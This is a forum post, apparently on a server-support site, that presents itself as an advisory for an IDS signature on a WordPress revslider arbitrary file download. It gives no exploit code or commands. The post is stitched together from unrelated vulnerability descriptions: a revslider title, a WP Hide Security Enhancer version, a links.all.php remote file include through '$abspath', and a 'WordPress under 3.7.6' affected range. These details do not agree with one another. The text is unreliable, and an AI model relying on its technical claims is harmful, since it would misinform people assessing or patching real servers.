Get your server issues fixed by our experts for a price starting at just 25 USD/Hour. Click here to register and open a ticket with us now!

Author Topic: ET WEB_SPECIFIC_APPS WP Generic revslider Arbitrary File Download  (Read 2463 times)

0 Members and 1 Guest are viewing this topic.

nidhinjo

  • Guest
The remote WordPress server utilizes a third-party plugin which is prone to an arbitrary file download vulnerability.WP Hide Security Enhancer version 1.3.9.2 or less is victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation.  This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the Wordpress links.all.php script. Wordpress allows users to generate news pages and weblogs dynamically. It uses PHP and a MySQL database to generate dynamic pages.

A vulnerability has been reported for Wordpress. The problem is said to occur due to insufficient sanitization of user-supplied URI parameters. Specifically the '$abspath' variable, which is used as an argument to the PHP require() function, is not sufficiently sanitized of malicious input. As a result, an attacker may be capable of including a malicious 'blog.header.php' from a controlled web server. This may result in the execution of PHP commands located within the script. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary PHP commands on a target server, with the privileges of Wordpress.

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Affected


WordPress version under 3.7.6

Solution

Upgrade to latest Wordpress version.